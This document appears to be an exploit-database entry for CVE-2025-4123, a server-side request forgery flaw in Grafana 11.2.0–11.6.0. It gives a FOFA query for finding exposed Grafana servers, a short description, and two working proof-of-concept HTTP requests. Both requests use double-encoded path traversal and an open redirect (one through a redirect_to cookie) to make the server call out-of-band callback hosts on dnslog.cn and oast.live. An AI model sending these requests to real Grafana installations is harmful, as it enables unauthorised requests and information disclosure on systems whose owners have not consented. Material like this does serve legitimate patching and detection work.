# Exploit Title: Grafana  11.6.0 - SSRF 
# FOFA: app="Grafana"
# Date: 2-11-2025
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://grafana.com/
# Software Link: https://grafana.com/grafana/download
# Version: 11.2.0 - 11.6.0
# CVE: CVE-2025-4123

Description:
An SSRF (Server-Side Request Forgery) vulnerability exists in Grafana's `render/public` (and related public rendering) endpoints owing to a combination of client-side path traversal encoding and an open redirect. Under certain configurations — especially when anonymous access or vulnerable plugins (e.g., Image Renderer) are enabled — an attacker can cause the server to perform requests to attacker-controlled hosts or induce redirections that lead to SSRF and subsequent information disclosure.

POC:
GET /render/public/..%252f%255Cczeqm5.dnslog.cn%252f%253F%252f..%252f.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

GET /public/..%2F%5c123.czeqm5.dnslog.cn%2F%3f%2F..%2F.. HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12) AppleWebKit/616.19 (KHTML, like Gecko) Version/17.7.17 Safari/616.19
Connection: close
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cd0nt31pu8bl7cn5ncca08sg68smps8h39.oast.live%25252f%25253F%25252f..%25252f..
Accept-Encoding: gzip